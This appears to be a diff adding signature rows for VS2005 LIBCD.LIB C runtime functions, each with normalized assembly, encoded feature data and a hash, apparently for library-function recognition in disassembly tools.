+_DllMain@12,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nMOV R32,CONST\nPOP EBP\nRETN CONST",RcjtvAAAAAAAAAAACyuLmgAAAAAAAAAAcMiU5Asri5okA8OdJAPDnQsri5pFyO28,[],1933a7a113d2fcfa30dbc6f1d14ace080dfc5f18,VS2005,LIBCD.LIB
+_wcslen,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD CONST,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nTEST R32,R32\nJCC CONST",KB22qHrBavleo4MnAOHWawAAAAAAAAAAXqODJygdtqgAAAAA6EX5tygdtqgAAAAAesFq+QDh1msAAAAA,[],43dabf2ee976a1aee72b0cb4310a47ee774bbde6,VS2005,LIBCD.LIB
+_ftell,"PUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nCMP R32,DWORD PTR SS:[EBP+CONST]\nJCC CONST",vmPTG00oA0nBQMD6PsqG2V6jgycAAAAASogAy16jgydtSQUGXqODJ5yGUTgAAAAAXqODJz7KhtkAAAAAbRuS6l6jgyc+yobZPsqG2U0oA0kAAAAAbRuS6uMvJ75qYJqHTSgDSb/RaZ0AAAAAPsqG2V6jgycAAAAAt5wE4+RSvJ+S9NEBv9FpncSg0gkAAAAAXqODJ/Qbf9IAAAAAamCah8Sg0gkAAAAAXqODJ00oA0kAAAAAnIZROORSvJ+S9NEBkvTRAeRSvJ91gwavWpAeiV6jgye8OPIq4y8nvm0bkupakB6JvDjyKkqIAMsAAAAAHhi6OcSg0gkAAAAAwUDA+nkqQl9TiELubUkFBl6jgycAAAAAMekEoBJPDSHke5wDbRuS6pyGUTgeGLo5nIZROMSiU5jLgsuVdYMGr5yGUTiMLwcO5FK8n5yGUTiMLwcOU4hC7oOuQ14AAAAA5HucAxJPDSH0Ke4IxKDSCQAAAAAAAAAAjC8HDnAwqL2qz8W9xKJTmL/RaZ0p2auwrydXXMSg0gkAAAAA9CnuCAZiiMMAAAAAPsqG2YOuQ14AAAAAEk8NIU0oA0k+yobZKdmrsL5j0xufnB88qs/FvW0bkuqvJ1dcy4LLlcSg0gkAAAAAg65DXm0bkuptSQUGBmKIw00oA0k+yobZn5wfPL/RaZ0AAAAAcDCovW0bkuqvJ1dcbUkFBl6jgyc+yobZeSpCXxJPDSEx6QSg9Bt/0l6jgydtSQUG,[],66b68565cb39ffbfdd837b0689a0b551960973b9,VS2005,LIBCD.LIB
+_mblen,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",KrNC3qqT3bIAAAAAJAPDneRSvJ8kA8OdzkQoslLDT0DEkqZoxJKmaKqT3bIAAAAAnIZROPumcLdmeTE1JAPDneRSvJ+S9NEBUsNPQKqT3bIAAAAAZnkxNaqT3bIAAAAAxJKmaKqT3bIAAAAAdYMGryQDw52chlE45FK8nyQDw52chlE4byT/IyqzQt7EkqZokvTRAeRSvJ91gwav+6Zwt28k/yMkA8OdJAPDncSSpmjuiKz+nIZROGZ5MTWkF2NvqpPdsgAAAAAAAAAA7ois/sSSpmjORCiyoWDqNuRSvJ8kA8OdpBdjb2Z5MTWchlE4,[],9de64ee51fc991719f4b479672926a63643685db,VS2005,LIBCD.LIB
+__ms_p5_mp_test_fdiv,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nCALL DWORD PTR DS:[0]\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",ManSGsGM7u/efs64wYzu70+LzAoAAAAA3n7OuMGM7u8bK54jGyueI0+LzAoAAAAAT4vMCgAAAAAAAAAA,[],e72d43b10c79c329bc5d264e9b3f687a31f761c0,VS2005,LIBCD.LIB
+__ms_p5_test_fdiv,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],CONST\nMOV DWORD PTR SS:[EBP+CONST],CONST",lnPwX7s9SYUAAAAAo/EEaZZz8F/0Ke4I9CnuCLs9SYUAAAAAuz1JhQAAAAAAAAAA,[],bd8e7b395ef9b3679e2a8626f244d2dbc5dfde6b,VS2005,LIBCD.LIB
+__free_base,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",T6vMHHzeNCBAPBIrfN40IE+LzAoAAAAAjLRRTk+rzBxeo4MnQDwSK0+LzAoAAAAAT4vMCgAAAAAAAAAAXqODJ0+LzAoAAAAA,[],b76df0826acf7a4cbd83ad4b871325c1ec37b824,VS2005,LIBCD.LIB
+__lfind,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR SS:[EBP+CONST]\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",Ju7hZU+LzAoAAAAAT4vMCgAAAAAAAAAAoDc6oU+LzAoAAAAASogAyybu4WXl2NSBc1+hJEqIAMsAAAAAGVk2qEqIAMsAAAAA5djUgXNfoSSgNzqh,[],50695f51c9fad0fdf780f8d85053a4be2d07a38b,VS2005,LIBCD.LIB
+__wexecvpe,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",5FK8n5yGUTghIEElmMPLNiEgQSUAAAAA5FK8n4OuQ14I+thEyebY/zUWchM1dZFUCPrYRORSvJ+S9NEBjS/8iF6jgydAPBIrQDwSKx8Y6EEAAAAAkvTRAeRSvJ91gwavdYMGr5yGUTiDrkNeNXWRVDe217g1FnITnIZROJFuf7yPuGMmdYMGryEgQSWchlE4kvTRAeRSvJ91gwavdYMGr4OuQ14I+thEj7hjJpFuf7wAAAAAXqODJ5yGUTgAAAAAISBBJeRSvJ+S9NEByebY/yEgQSXJ5tj/iEIfDCEgQSWchlE4kW5/vAAAAAAAAAAANRZyE5yGUTgAAAAA5FK8nyEgQSWchlE4N7bXuCEgQSU1FnITnIZROORSvJ+S9NEBdYMGrwj62EQfGOhB5FK8nwj62EQfGOhBkvTRAeRSvJ91gwavHxjoQTUWchN0wPhw6H4nTMnm2P/ofidM6H4nTI0v/Iix9uXy7xfqreRSvJ+S9NEB6H4nTF6jgyfJ5tj/NRZyE5yGUTgAAAAA5FK8n5yGUTiDrkNedMD4cDUWchN0wPhwnIZROORSvJ+S9NEBHxjoQSEgQSXofidMISBBJczBSefofidMzMFJ540v/IjofidMg65DXuRSvJ+S9NEBkvTRAeRSvJ91gwavkvTRAeRSvJ91gwavyebY/yEgQSVeo4MndMD4cDUWchMhIEElsfbl8o0v/IgAAAAA02vy2szBSeeYw8s2XqODJ5yGUTgAAAAAISBBJZyGUTiIQh8MdYMGr5yGUTghIEEl6H4nTMzBSefTa/LaISBBJTV1kVTJ5tj/,[],9028281123957dc7c68e7b0c750f63fe07229bb8,VS2005,LIBCD.LIB
+__dospawn,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],0\nMOV BYTE PTR SS:[EBP+CONST],0\nMOV R8,BYTE PTR SS:[EBP+CONST]\nMOV BYTE PTR SS:[EBP+CONST],R8\nMOV R8,BYTE PTR SS:[EBP+CONST]",T4vMCgAAAAAAAAAA6KRdaE+LzAoAAAAAO9E98wAAAAAAAAAAD9LJReikXWg70T3z,[],b87396c402016129d2e40c0659e6d33cfbbaa776,VS2005,LIBCD.LIB
+__filbuf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",nIZROORSvJ+S9NEBMekEoBpA9hRtG5LqkvTRAeRSvJ91gwavbRuS6hpA9hRo50nZ5HucA9ewl/cp2auw/iJHfCkXcdUAAAAAaOdJ2RpA9hQAAAAAKdmrsJZz8F+dWiLmnrx+KykXcdUAAAAAdYMGr5yGUThi2SnJ5FK8n5yGUThi2SnJGkD2FMSg0gkAAAAAYtkpya8nV1wx6QSgKRdx1Yex+6Ep2auwMekEoDHpBKCvJ1dclnPwXys6sJEAAAAAt5wE4+RSvJ+S9NEBrydXXMSg0gkAAAAAxKDSCQAAAAAAAAAAKzqwkdewl/eMK0ujMekEoE++5JsKFlioKdmrsOR7nAOHsfuhChZYqMSg0gkAAAAAh7H7ocSg0gkAAAAAjCtLo9ewl/cAAAAA17CX9xpA9hQx6QSgT77km568fiv+Ikd8nVoi5is6sJEAAAAA,[],ea70e1a72e198b86444e6f5d0ef2bdffda19dd87,VS2005,LIBCD.LIB
+___setargv,"PUSH CONST\nPUSH CONST\nPUSH CONST\nCALL DWORD PTR DS:[0]\nMOV DWORD PTR DS:[0],0\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nTEST R32,R32",GbE/vkwGv0u/HL4xwCkpAOmyVw8UZSvoT4vMCgAAAAAAAAAA+NVf1OmyVw8UZSvoFGUr6BmxP74AAAAAesqNrU+LzAoAAAAATAa/S0+LzAp6yo2tEIVrf/jVX9TAKSkA6bJXD0wGv0u/HL4xvxy+MU+LzAp6yo2t,[],6bbf96caa4d6a9c30c4ae14d1f8b46ad2a83f5ff,VS2005,LIBCD.LIB
+_wWinMainCRTStartup,"PUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],0\nCALL CONST\nCALL CONST\nMOV DWORD PTR DS:[0],R32\nCALL CONST",3B+M8zSwRvHne+unqvPN8+0WVUoAAAAA53vrp+nJoC2q883z6cmgLQAAAAAAAAAANLBG8enJoC2q883z7RZVSgAAAAAAAAAA,[],840b54363c1bb039f69a49e92f9253dd83f034ad,VS2005,LIBCD.LIB
+__wspawnvpe,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",nIZROLs9SYVWMtm85FK8n4OuQ14I+thEQDwSK97g538AAAAA7xfqreRSvJ+S9NEB1GsWHZyGUTiqsMfM6H4nTI0v/Ii5zn1Guz1JhQAAAAAAAAAAnIZROORSvJ+S9NEBXqODJ5yGUTgAAAAAJAPDnTUWchN0wPhwg65DXuRSvJ+S9NEBkvTRAeRSvJ91gwavqrDHzI0v/IjofidMdMD4cDUWchM1dZFUVjLZvAAAAAAAAAAAuc59Rl6jgydAPBIryebY/zUWchPJ5tj/NXWRVDUWchMCzreOdYMGr5yGUTghIEEl5FK8n5yGUTghIEEl3uDnf16jgyckA8OdO4+r5eRSvJ8AAAAAISBBJeRSvJ+S9NEB6H4nTMnm2P/ofidMCPrYRORSvJ+S9NEBAs63jvPmj5Y1FnITkvTRAeRSvJ87j6vlkvTRAeRSvJ87j6vl6H4nTF6jgyfJ5tj/kvTRAeRSvJ87j6vlXqODJ5yGUTgAAAAAJAPDnTUWchPofidMjS/8iF6jgydAPBIrNRZyE5yGUTgAAAAA5FK8nyEgQSWchlE4yebY/zUWchNeo4Mn8+aPlpyGUTjUaxYdnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8nwj62ETe4Od/O4+r5eRSvJ8AAAAAkvTRAeRSvJ87j6vlO4+r5eRSvJ8AAAAA3uDnfzUWchMkA8Od5FK8n5yGUTiDrkNeNRZyE/Pmj5YAAAAA,[],ee3924c95b3bfeaf8cf837cbdc10e1d19eaafed0,VS2005,LIBCD.LIB
+__mbsncoll,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",VaatKFXMwQkNzMABl3FRnk+LzAoAAAAADczAAU+LzAoAAAAA2jcg2k+LzAoAAAAAVczBCdo3INqXcVGeT4vMCgAAAAAAAAAA,[],5abd59bb399433feb2586e3265d85e87499c4945,VS2005,LIBCD.LIB
+?_query_new_mode@@YAHXZ,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nPOP EBP\nRETN",YAM74QAAAAAAAAAA,[],6e458b0ca597f920bfca5c36b00650c66ccface6,VS2005,LIBCD.LIB
+?_set_new_mode@@YAHH@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nCMP R32,DWORD PTR SS:[EBP+CONST]\nJCC CONST",xJKmaE+LzAoAAAAAINkXUB6PB3jEkqZoT4vMCgAAAAAAAAAAHo8HeE+LzAoAAAAA,[],f838030d00d2a9530c7b0dfbf0e0f5b7718965b1,VS2005,LIBCD.LIB
+__CIpow,"SUB ESP,CONST\nFXCH ST(1)\nFSTP QWORD PTR SS:[ESP]\nFST QWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",ZnmWXAAAAAAAAAAA,7Zw3jNFIlKUAAAAAW8hYLE8VpjIkGCKrDczAAZr2y/8AAAAAWlIZ8ZzufzAAAAAAnO5/MADh1msGW9GDZQNOz0zuzLsKkMvmyV64Y3rJtbf7M6fYBlvRgwDh1msAAAAAH/z+p7u2XCwAAAAAAOHWawAAAAAAAAAACpDL5pr2y/8AAAAAvbuALw3MwAEdHvzi6jKEuAZb0YMQ218zl6nKStFIlKUAAAAA0UiUpZzufzCzkyAMmvbL/3LoOkWchlE4ENtfMwZb0YMqs0Le6FWr2iV+lK4Ws3TC3QgapvzEoKo8UwzL+zOn2AiAfyTdCBqmCIB/JJzufzDawB9zKrNC3ru2XCwAAAAAs5MgDFHkdFEAAAAAu7ZcLKSC+aKkgvmi/MSgqtFIlKUAAAAApIL5ogAAAAAAAAAABlvRgwDh1msAAAAAnIZRODD8fCJy6DpFPFMMy9FIlKUAAAAA0UiUpZzufzCfE9yPcug6RVfm/f8bvrP5FrN0wgDh1mvqMoS4G76z+ZzufzD8xKCqdJ71iK7+VJ3BjO7vAOHWawAAAAAAAAAAJX6Urru2XCwf/P6nnxPcjwAAAAAAAAAAUeR0USV+lK7oVavawYzu767+VJ0AAAAAesm1t1pSGfFaUhnxrv5UnWUDTs+9u4AvTO7Mu1fm/f/o/oHQWlIZ8ZzufzAAAAAApIL5ogAAAAAAAAAA2sAfc5zufzAAAAAAH/z+p7u2XCwAAAAA6P6B0Jr2y/8AAAAAJBgiq9FIlKWXqcpKV+b9/9FIlKUAAAAA/MSgqtFIlKUAAAAAJX6Urru2XCwf/P6nTxWmMiQYIqvtnDeMMPx8Ilfm/f9X5v3/HR784ud0XHxbyFgs53RcfFvIWCzJXrhjV+b9/9FIlKUAAAAA,609a4a3ca92856ab20478f49ab77880d3a3ed7d4,VS2005,LIBCD.LIB
+_pow,"LEA R32,DWORD PTR SS:[ESP+CONST]\nCALL CONST\nMOV R32,R32\nPUSH R32\nWAIT\nFSTCW WORD PTR SS:[ESP]\nCMP WORD PTR SS:[ESP],CONST\nJCC CONST",6P6B0Jr2y/8AAAAAvbuALw3MwAEdHvzi/MSgqtFIlKUAAAAATxWmMiQYIqvtnDeMMPx8Ilfm/f9X5v3/HR784ud0XHxbyFgs53RcfFvIWCzJXrhjV+b9/9FIlKUAAAAA7Zw3jNFIlKUAAAAAW8hYLE8VpjIkGCKrWlIZ8U8VpjIAAAAADczAAZr2y/8AAAAAZQNOz0zuzLsoGbdpyV64Y3rJtbf7M6fYJBgiq9FIlKUR3zjEV+b9/9FIlKUAAAAAKBm3aXLoOkWchlE4+zOn2AiAfyTdCBqmEd84xLOTIAyzkyAM0UiUpbOTIAyzkyAMmvbL/3LoOkWchlE4s5MgDNFIlKUAAAAA3QgapvzEoKo8UwzLnIZRODD8fCJy6DpFPFMMy9FIlKUAAAAAPqKy/a7+VJ3cLytH0UiUpZ8T3I+fE9yPcug6RVfm/f8bvrP5G76z+fzEoKr8xKCqCIB/JNrAH3PawB9znxPcjwAAAAAAAAAA2sAfc3rJtbcAAAAA3C8rR2UDTs+9u4Avesm1t1pSGfFaUhnxrv5UnWUDTs+9u4AvTO7Mu1fm/f/o/oHQ/MSgqtFIlKUAAAAAWlIZ8VpSGfEAAAAA,[],03168b286da12a565ade1957d06d5bdd5ba83587,VS2005,LIBCD.LIB
+__getpath,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV BYTE PTR DS:[R32],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,DWORD PTR SS:[EBP+CONST]\nNEG R32\nSBB R32,R32\nAND R32,DWORD PTR SS:[EBP+CONST]\nMOV ESP,EBP",bUkFBqQXY28jJy2YNRZyE3CfvosAAAAAIyctmF6jgydxWpQ6UVw0V21JBQaYAlI+mAJSPm1JBQZtSQUGbUkFBj7KhtkjJy2YIyctmF6jgyca72UOcVqUOnCfvosAAAAAXqODJ6QXY28AAAAApBdjbzUWchM+yobZPsqG2TUWchMAAAAANRZyE1FcNFcAAAAAbUkFBnCfvovIUl/XLtQI0m1JBQYAAAAAbUkFBp0cG6vIUl/XGu9lDnCfvosAAAAAyFJf121JBQYAAAAAyFJf121JBQYAAAAAXqODJzUWchMAAAAAPsqG2aQXY28AAAAAcJ++iwAAAAAAAAAAnRwbq1FcNFc1FnITpBdjb6QXY29tSQUG,[],df25d2b6d91d3a75131a36b07a3bc905c4f2bf29,VS2005,LIBCD.LIB
+__ismbcprint,"MOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32*2+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",Umd/BpZz8F8e0JUB9CnuCKA3OqEAAAAA9CnuCEFF0BsAAAAASsDrlhLljK+Z1PSAHtCVAZZz8F/0Ke4IZnkxNU+LzAoAAAAAoDc6oU+LzAoAAAAAJElloJZz8F/0Ke4IlnPwX0FF0BsAAAAAEuWMr5Zz8F8kSWWglnPwX6A3OqEAAAAAQUXQG0+LzAoAAAAAT4vMCgAAAAAAAAAADczAAU+LzAoAAAAAmdT0gGs/0wRmeTE1az/TBFJnfwYNzMAB,[],38c031efea7c1bc5c19dc1b011b492391db08798,VS2005,LIBCD.LIB
+__wsetenvp,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR DS:[R32+R32*2+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",sQw7eyEgQSUAAAAAISBBJfVI3EEgYMvTFqw+3CEgQSUAAAAA6H4nTNXC7kc+yobZesqNrduYx7QAAAAA1cLuRyEgQSUAAAAAdpz9miEgQSUAAAAA0auCLtuYx7R6yo2tIGDL0zUWchPRq4IuPsqG2dXC7kcAAAAAOS0clXac/ZqxDDt7NRZyE062AkwAAAAAISBBJTktHJXofidMTrYCTCEgQSUAAAAA25jHtDUWchMAAAAA9UjcQQAAAAAAAAAA,[],6afc3a0c3ca5ddcced03e293080a43a8d23dba1e,VS2005,LIBCD.LIB
+__wspawnl,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",kvTRAeRSvJ87j6vlrKbWTpyGUTgAAAAAkvTRAeRSvJ87j6vlnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTghIEElnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTghIEElkvTRAeRSvJ87j6vlxUZ/LAAAAAAAAAAAkvTRAeRSvJ87j6vlISBBJeRSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8nyEgQSXFRn8sISBBJeRSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8nyEgQSWchlE4,[],ad5bcec78ddcb300dbbdc5d979ce4b88767598b5,VS2005,LIBCD.LIB
+__mbsspn,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",4dkFeeHZBXl33LbYXqODJ7/RaZ0AAAAAd9y22DUWchOxRhSdd9y22PhN/Cr4TfwqsUYUnTUWchNeo4Mn+E38Kg/RU+3/vke7EIVrf3FalDorieMfXqODJ7/RaZ0AAAAANRZyEz7KhtkAAAAA/75Hu16jgycP0VPtv9FpnU+LzAoAAAAAT4vMCgAAAAAAAAAA+E38Kl6jgydeo4MnD9FT7chSX9deo4MncVqUOhSSUkEAAAAAXqODJ+HZBXkAAAAAyFJf116jgycAAAAAPsqG2RSSUkEAAAAAFJJSQb/RaZ1xWpQ6K4njH0+LzAoAAAAAcVqUOuHZBXkAAAAAXqODJ+HZBXkAAAAAXqODJz7KhtkAAAAA4dkFeXfcttheo4MnPsqG2eHZBXkAAAAA,[],e0a49976166b40d52c417131dc3c172aff70a5db,VS2005,LIBCD.LIB
+__wwincmdln,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD CONST,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nCMP R32,CONST\nJCC CONST",J0joCOh+J0y44TaoyFJf1+h+J0wAAAAAyFJf1yEgQSUAAAAAPsqG2V6jgycAAAAAISBBJdUc1LbofidMISBBJeh+J0xeo4Mn1RzUtgAAAAAAAAAAXqODJyEgQSUAAAAA6H4nTCEgQSXIUl/XuOE2qOh+J0whIEEl6H4nTNUc1LbIUl/XXqODJ7jhNqgAAAAA6H4nTF6jgyc+yobZ,[],c11955eeb355d334b59f01532f5d8f369f251ce9,VS2005,LIBCD.LIB
+__access,"CALL DWORD PTR DS:[0]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nOR R32,CONST\nJMP SHORT CONST",DpXpTCbu4WUOlelMDpXpTCbu4WWDEaxcR4CkOU+LzAoAAAAAJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAAgxGsXE+LzAoAAAAAcnVwhA6V6UxHgKQ5,[],a666deecb42d8243bef3ffd5ec216f503d348ad9,VS2005,LIBCD.LIB
+__telli64,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST",JozPjQAAAAAAAAAA,IdA0QYvOGzR2/Pqmi84bNE+LzAoAAAAAAWljvCHQNEEhi1fVZj8TXk+LzAoAAAAABmKIwwFpY7xmPxNejNadWE+LzAoAAAAAT4vMCgAAAAAAAAAAIYtX1U+LzAoAAAAA7bLtN2Y/E14GYojDdvz6povOGzSM1p1Y,9a9e6650f00a68f0ef7ed7e8cab3de7ff839b4f5,VS2005,LIBCD.LIB
+__execle,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",pBdjb+RSvJ+S9NEB5FK8n6QXY29BuD80kvTRAeRSvJ87j6vlQbg/NPolUsleo4MnO4+r5eRSvJ8AAAAA5FK8n6QXY2+chlE4uaShIZyGUTgAAAAAkvTRAeRSvJ87j6vlO4+r5eRSvJ8AAAAAnIZROORSvJ+S9NEBXqODJ0G4PzQAAAAA5FK8n5yGUTikF2NvkvTRAeRSvJ87j6vlnIZROORSvJ+S9NEBpBdjb+RSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTikF2NvkvTRAeRSvJ87j6vl+iVSyQAAAAAAAAAAO4+r5eRSvJ8AAAAA,[],70987cafa08adb86bcd1ce5fc29e31fe8cf0da44,VS2005,LIBCD.LIB
+_difftime,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nFILD DWORD PTR SS:[EBP+CONST]\nMOV ESP,EBP",cEFrVgAAAAAAAAAA,[],cd82d0e9fef7b19ec402bf6b2ffd8de16b06de2a,VS2005,LIBCD.LIB
+__wcsicmp,"MOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nSUB R32,R32\nMOV ESP,EBP\nPOP EBP\nRETN",K7Cp5bAkKBm5Nqh8hE9KeiIpKKzofidMv5o+w/UWDpwAAAAAkyDC5Oh+J0xeo4Mnv5o+w4RPSnoAAAAAsCQoGQAAAAAAAAAA6H4nTJN5sDTofidMIikorF6jgyeTIMLkuTaofCuwqeWwJCgZk3mwNCIpKKzofidM5c48RyuwqeXofidM9RYOnF6jgyeTIMLk6H4nTCIpKKy/mj7D6H4nTJN5sDS/mj7DXqODJ7AkKBkAAAAA,[],412ffeada268ab5e06e2a4898de35341e2e310ed,VS2005,LIBCD.LIB
+__tell,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",l2ov5AAAAAAAAAAA,Y8q89wAAAAAAAAAAOo27l2PKvPeZeO5vnIZROGPKvPeZeO5v7bLtN+ikXWgGYojDda1LDU+LzAoAAAAAmXjub0+LzAoAAAAA6KRdaE+LzAoAAAAAT4vMCgAAAAAAAAAAT6vMHEux5fN1rUsNbGYbnJyGUTgAAAAAS7Hl8zqNu5dsZhucBmKIw0+rzBzopF1o,9f975c7d7c454ed26dc2c61844f32086cc55021f,VS2005,LIBCD.LIB
+__strnicmp,"INC R32\nINC R32\nPUSH R32\nPUSH R32\nPUSH R32\nCALL CONST\nMOV R32,R32\nADD ESP,CONST",6FWr2sTZicANzMABDczAAcTZicAAAAAAFXt9JeRSvJ9y6DpFgmepfuRSvJ9y6DpFcug6ReRSvJ/y4eVj8uHlY+hVq9qX2nuUFp+5AMTZicA11bmaNdW5mhV7fSXJXi3Ml9p7lIJnqX7kUryf5FK8n8TZicDoVava6FWr2sTZicD8fhA2yV4tzE53gnzYzQSm/H4QNgAAAAAAAAAAxNmJwAAAAAAAAAAAs8e6qk53gnzYzQSm2M0Epk53gnw04PrCNOD6wtjNBKbYzQSm2M0EptjNBKZ/15Gof9eRqNjNBKbYzQSm2M0EptjNBKbYzQSm2M0EptjNBKZ/15Gof9eRqOhVq9qX2nuU2M0EpuhVq9qX2nuUl9p7lLPHuqpOd4J8TneCfMTZicDoVava,[],0fdcee32563860cee35c7dbd94832d7a10edf64b,VS2005,LIBCD.LIB
+__cexit,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nPOP EBP",nVoZ+AAAAAAAAAAA,T4vMCgAAAAAAAAAAJAPDnQY2QOh9X7eNfV+3jQY2QOiDrkNenIZROEC6y0Feo4Mng65DXl6jgycAAAAAoMVw5sbSyS0kA8OdXqODJ0+LzAoAAAAAchMCgKDFcOYQ2qMjQLrLQQAAAAAAAAAAUqVqhAY2QOiDrkNe7T1cVkC6y0Feo4MnxtLJLZyGUTji3M2sENqjI8bSyS0kA8Od4tzNrJyGUTjtPVxWBjZA6JyGUTji3M2sXqODJ1KlaoQAAAAA,122261900bab31b888892894fec7d37edbf9827c,VS2005,LIBCD.LIB
+__cinit,"PUSH EBP\nMOV EBP,ESP\nCMP DWORD PTR DS:[0],0\nJCC CONST",BhbNngAAAAAAAAAAZ0uEQgAAAAAAAAAAOWijNAYWzZ5nS4RC,[],a9f5f81694b1d3c6ef3fd0a9539a644e69cfc995,VS2005,LIBCD.LIB
+__c_exit,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nPOP EBP",nVoZ+AAAAAAAAAAA,ENqjI8bSyS0kA8OdUqVqhAY2QOiDrkNe7T1cVkC6y0Feo4MnBjZA6JyGUTji3M2sJAPDnQY2QOh9X7eNXqODJ1KlaoQAAAAA4tzNrJyGUTjtPVxWT4vMCgAAAAAAAAAAxtLJLZyGUTji3M2snIZROEC6y0Feo4Mng65DXl6jgycAAAAAoMVw5sbSyS0kA8OdXqODJ0+LzAoAAAAAchMCgKDFcOYQ2qMjQLrLQQAAAAAAAAAAfV+3jQY2QOiDrkNe,f532586897e40a71e94604fdeb2547f129679aad,VS2005,LIBCD.LIB
+_exit,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",l2ov5AAAAAAAAAAA,T4vMCgAAAAAAAAAAJAPDnQY2QOh9X7eNfV+3jQY2QOiDrkNenIZROEC6y0Feo4Mng65DXl6jgycAAAAAoMVw5sbSyS0kA8OdXqODJ0+LzAoAAAAAchMCgKDFcOYQ2qMjQLrLQQAAAAAAAAAAUqVqhAY2QOiDrkNe7T1cVkC6y0Feo4MnxtLJLZyGUTji3M2sENqjI8bSyS0kA8Od4tzNrJyGUTjtPVxWBjZA6JyGUTji3M2sXqODJ1KlaoQAAAAA,33ec88a293bf471a687a6c06d0a7e7707b317c44,VS2005,LIBCD.LIB
